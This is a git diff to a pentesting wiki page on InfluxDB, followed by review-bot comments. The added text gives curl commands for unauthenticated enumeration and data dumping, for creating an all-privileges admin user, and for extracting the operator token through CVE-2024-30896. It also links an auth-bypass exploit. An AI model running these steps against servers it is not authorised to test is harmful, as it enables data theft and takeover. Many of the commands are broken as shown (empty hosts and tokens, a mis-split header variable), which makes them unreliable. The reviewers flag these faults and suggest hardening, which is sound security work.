diff --git a/src/network-services-pentesting/8086-pentesting-influxdb.md b/src/network-services-pentesting/8086-pentesting-influxdb.md index a6555a2a5ff..654eb9cc2f4 100644 --- a/src/network-services-pentesting/8086-pentesting-influxdb.md +++ b/src/network-services-pentesting/8086-pentesting-influxdb.md @@ -13,6 +13,21 @@ PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 ``` +## Identify & Version (HTTP) + +- v1.x: `GET /ping` returns status 204 and headers like `X-Influxdb-Version` and `X-Influxdb-Build`. +- v2.x+: `GET /health` returns JSON with the server version and status. Works without auth. + +```bash +# v1 banner grab +curl -i http://:8086/ping + +# v2/compat health +curl -s http://:8086/health | jq . +``` + +Tip: exposed instances often also serve Prometheus-style metrics at `/metrics`. + ## Enumeration From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info. @@ -22,8 +37,8 @@ From a pentester point of view this another database that could be storing sensi InfluxDB might require authentication or not ```bash -# Try unauthenticated -influx -host 'host name' -port 'port #' +# Try unauthenticated CLI (v1 shell) +influx -host -port 8086 > use _internal ``` 
@@ -35,9 +50,50 @@ influx –username influx –password influx_pass There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) -### Manual Enumeration +### Manual Enumeration (v1 HTTP API / InfluxQL) + +Even when no CLI is available, the HTTP API is usually exposed on port 8086. + +```bash +# List databases (unauth) +curl -sG "http://:8086/query" --data-urlencode "q=SHOW DATABASES" + +# List retention policies of a DB +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf" + +# List users (if auth disabled) +curl -sG "http://:8086/query" --data-urlencode "q=SHOW USERS" -The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). +# List measurements (tables) +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS" + +# List field keys (columns) +curl -sG "http://:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS" + +# Dump data from a measurement +curl -sG "http://:8086/query" \ + --data-urlencode "db=telegraf" \ + --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq . + +# Force epoch timestamps (useful for tooling) +curl -sG "http://:8086/query" \ + --data-urlencode "epoch=ns" \ + --data-urlencode "db=telegraf" \ + --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' +``` + +> [!WARNING] +> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` + +If authentication is disabled, you can even create users and escalate: + +```bash +# Create an admin user (v1, auth disabled) +curl -sG "http://:8086/query" \ + --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' 
WITH ALL PRIVILEGES" +``` + +The information of the following CLI example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). #### Show databases 
@@ -109,13 +165,60 @@ time cpu host usage_guest usage_guest_nice usage_idle 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 ``` -> [!WARNING] -> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` +### InfluxDB v2.x API (Token-based) + +InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate: + +```bash +# Basic org, bucket, and auth discovery +TOKEN=""; H="-H Authorization: Token $TOKEN" + +# Health & version +curl -s http://:8086/health | jq . + +# List organizations +curl -s $H http://:8086/api/v2/organizations | jq . + +# List buckets +curl -s $H 'http://:8086/api/v2/buckets?limit=100' | jq . + +# List authorizations (requires perms) +ORGID= +curl -s $H "http://:8086/api/v2/authorizations?orgID=$ORGID" | jq . + +# Query data with Flux +curl -s $H -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \ + -X POST http://:8086/api/v2/query \ + --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)' +``` + +Notes +- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests. +- In v2, the HTTP `Authorization` header must be in the form `Token `. -### Automated Authentication +### Automated Enumeration ```bash msf6 > use auxiliary/scanner/http/influxdb_enum ``` +### Recent vulns and privesc of interest (last years) + +- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). 
With that token, the attacker can administrate the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test: + +```bash +# Using a low-priv/all-access token tied to the default org +curl -s -H 'Authorization: Token ' \ + 'http://:8086/api/v2/authorizations?orgID=' | jq . +# Look for entries of type "operator" and extract the raw token (if present) +``` + +- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you. + + + +## References + +- InfluxData docs: InfluxDB v1/v2 HTTP API reference (endpoints like `/ping`, `/health`, `/query`, `/api/v2/authorizations`). +- CVE-2024-30896 operator token exposure in InfluxDB OSS 2.x. {{#include ../banners/hacktricks-training.md}}
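Review bot: in the first hunk (`@@ -13,6 +13,21 @@`, Identify & Version) both curl targets are missing the host, `curl -i http://:8086/ping` and `curl -s http://:8086/health`, so they fail with a malformed URL as written; the angle-bracket placeholder was most likely stripped as HTML when the Markdown was rendered, so write it as `http://<host>:8086/ping` inside the fence and check the same stripping in the later hunks of this PR. One accuracy point for the bullets: the v2 bullet says "Works without auth" but the v1 bullet does not, and `/ping` likewise answers before authentication on 1.x, which is worth stating because it means the `X-Influxdb-Version` disclosure happens pre-auth and operators should treat it as a reason not to expose 8086 directly.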
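Review bot: in the second hunk (`@@ -22,8 +37,8 @@`) the new line `influx -host -port 8086` is broken: `-host` takes a value, so the CLI reads `-port` as the hostname and then has `8086` left over as a stray argument. Restore the placeholder, `influx -host <host> -port 8086` (the removed line at least kept the slot visible as `'host name'`). Since the comment now says "(v1 shell)", add one sentence noting that the `influx` binary shipped with 2.x is a different, token-based CLI, so readers facing a 2.x server should skip to the `/api/v2` section rather than expecting this command to work.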
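Review bot: in the third hunk (`@@ -35,9 +50,50 @@`) the `CREATE USER hacker WITH PASSWORD ... WITH ALL PRIVILEGES` request is sent with `curl -sG`, i.e. as a GET, but the 1.x `/query` endpoint only accepts `SELECT` and `SHOW` over GET; state-changing statements (`CREATE`, `DROP`, `GRANT`, `ALTER`, `DELETE`) must be POSTed, so the command as written is rejected. Drop `-G` and use `curl -s -XPOST "http://<host>:8086/query" --data-urlencode "q=..."`. Every URL in this hunk also has the empty host (`http://:8086/query`) and needs the `<host>` placeholder restored. The sentence "If authentication is disabled, you can even create users and escalate" should be paired with the control that closes the hole, since that is what a reader hardening a deployment needs: `auth-enabled = true` under `[http]` in influxdb.conf, which makes all of these unauthenticated `/query` calls fail, plus not exposing 8086 beyond the hosts that write metrics. Minor: the WARNING block moved into this hunk says "the authentication bypass" without naming it; reference CVE-2019-20933 from the line just above so the note stands on its own.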
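Review bot: in the fourth hunk (`@@ -109,13 +165,60 @@`) the shortcut `H="-H Authorization: Token $TOKEN"` followed by an unquoted `$H` does not do what the comments claim: bash word-splits it into four arguments, so curl receives `-H Authorization:` (an empty header) and then tries to fetch `Token` and the token value as URLs, and none of the requests in the block is actually authenticated. Write the header inline on each call, `curl -s -H "Authorization: Token $TOKEN" ...`, or use an array (`H=(-H "Authorization: Token $TOKEN")` and `"${H[@]}"`). The Flux POST also omits the `org`/`orgID` query parameter that `/api/v2/query` expects, e.g. `"http://<host>:8086/api/v2/query?org=<org>"`. `TOKEN=""`, `ORGID=` and the `Token ` / `orgID=` values in the CVE-2024-30896 quick test are all empty placeholders (same HTML stripping as the earlier hunks). For the vulnerability bullet, the mitigation should add the check an operator can run today: review the same `GET /api/v2/authorizations` listing for active operator-permission tokens and rotate them, and keep regular users out of the default organization as the text already says. Style: the heading "Recent vulns and privesc of interest (last years)" reads oddly ("Recent vulnerabilities and privilege escalation" would do), the three blank lines before `## References` should be one, and the "InfluxData docs" reference has no URL.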